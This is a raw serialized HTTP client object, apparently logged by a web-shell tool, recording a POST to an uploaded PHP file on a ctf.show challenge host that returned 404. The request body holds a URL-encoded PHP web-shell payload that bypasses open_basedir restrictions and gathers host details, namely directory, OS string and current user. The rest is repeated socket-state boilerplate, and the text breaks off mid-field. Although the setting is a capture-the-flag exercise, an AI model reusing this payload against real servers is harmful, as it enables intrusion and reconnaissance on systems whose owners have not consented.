{"response":{"_events":{},"_eventsCount":0,"accepted":false,"badRequest":false,"body":{"type":"Buffer","data":[]},"buffered":true,"clientError":true,"created":false,"error":{"method":"POST","path":"/uploads/20240213142923813.php","status":404},"forbidden":false,"header":{"connection":"close","content-encoding":"gzip","content-type":"text/html","date":"Tue, 13 Feb 2024 06:35:56 GMT","server":"nginx/1.20.1","transfer-encoding":"chunked"},"headers":{"connection":"close","content-encoding":"gzip","content-type":"text/html","date":"Tue, 13 Feb 2024 06:35:56 GMT","server":"nginx/1.20.1","transfer-encoding":"chunked"},"info":false,"links":{},"noContent":false,"notAcceptable":false,"notFound":true,"ok":false,"redirect":false,"redirects":[],"req":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":{"_consuming":false,"_dumped":false,"_events":{"error":[null,null]},"_eventsCount":3,"_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":false,"emitClose":true,"emittedReadable":false,"encoding":null,"endEmitted":true,"ended":true,"flowing":false,"highWaterMark":16384,"length":0,"needReadable":false,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":false,"readingMore":true,"resumeScheduled":false,"sync":true},"aborted":false,"client":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"complete":true,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"data":"","headers":{"connection":"close","content-encoding":"gzip","content-type":"text/html","date":"Tue, 13 Feb 2024 06:35:56 GMT","server":"nginx/1.20.1","transfer-encoding":"chunked"},"httpVersion":"1.1","httpVersionMajor":1,"httpVersionMinor":1,"method":null,"rawHeaders":["Server","nginx/1.20.1","Date","Tue, 13 Feb 2024 06:35:56 GMT","Content-Type","text/html","Transfer-Encoding","chunked","Connection","close","Content-Encoding","gzip"],"rawTrailers":[],"readable":false,"req":null,"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"statusCode":404,"statusMessage":"Not Found","trailers":{},"upgrade":false,"url":""},"sendDate":false,"shouldKeepAlive":false,"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"request":{"_agent":{},"_buffer":true,"_data":"web23=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(base64_decode(%22Lzt8Oi8%3D%22)%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.8709c43%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%24tmdir%3Drealpath(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2223%22.%22327%22%3Becho%20%40asenc(%24output)%3Becho%20%220e3%22.%2286b%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B","_enableHttp2":false,"_endCalled":true,"_events":{},"_eventsCount":0,"_formData":null,"_header":{"content-type":"application/x-www-form-urlencoded","user-agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)"},"_ignoreHttps":true,"_maxRedirects":5,"_proxyUri":"","_query":[],"_redirectList":[],"_redirects":0,"_resBuffered":true,"_responseTimeout":0,"_streamRequest":false,"_timeout":10000,"_uploadTimeout":0,"_url":"http://8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show/uploads/20240213142923813.php","called":true,"cookies":"","header":{"Content-Type":"application/x-www-form-urlencoded","User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)"},"host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","method":"POST","protocol":"http:","qs":{},"qsRaw":[],"req":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":{"_consuming":false,"_dumped":false,"_events":{"error":[null,null]},"_eventsCount":3,"_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":false,"emitClose":true,"emittedReadable":false,"encoding":null,"endEmitted":true,"ended":true,"flowing":false,"highWaterMark":16384,"length":0,"needReadable":false,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":false,"readingMore":true,"resumeScheduled":false,"sync":true},"aborted":false,"client":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"complete":true,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"data":"","headers":{"connection":"close","content-encoding":"gzip","content-type":"text/html","date":"Tue, 13 Feb 2024 06:35:56 GMT","server":"nginx/1.20.1","transfer-encoding":"chunked"},"httpVersion":"1.1","httpVersionMajor":1,"httpVersionMinor":1,"method":null,"rawHeaders":["Server","nginx/1.20.1","Date","Tue, 13 Feb 2024 06:35:56 GMT","Content-Type","text/html","Transfer-Encoding","chunked","Connection","close","Content-Encoding","gzip"],"rawTrailers":[],"readable":false,"req":null,"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"statusCode":404,"statusMessage":"Not Found","trailers":{},"upgrade":false,"url":""},"sendDate":false,"shouldKeepAlive":false,"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"res":{"_consuming":false,"_dumped":false,"_events":{"error":[null,null]},"_eventsCount":3,"_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":false,"emitClose":true,"emittedReadable":false,"encoding":null,"endEmitted":true,"ended":true,"flowing":false,"highWaterMark":16384,"length":0,"needReadable":false,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":false,"readingMore":true,"resumeScheduled":false,"sync":true},"aborted":false,"client":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":null,"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":null,"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"complete":true,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":null,"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":null,"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"data":"","headers":{"connection":"close","content-encoding":"gzip","content-type":"text/html","date":"Tue, 13 Feb 2024 06:35:56 GMT","server":"nginx/1.20.1","transfer-encoding":"chunked"},"httpVersion":"1.1","httpVersionMajor":1,"httpVersionMinor":1,"method":null,"rawHeaders":["Server","nginx/1.20.1","Date","Tue, 13 Feb 2024 06:35:56 GMT","Content-Type","text/html","Transfer-Encoding","chunked","Connection","close","Content-Encoding","gzip"],"rawTrailers":[],"readable":false,"req":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_p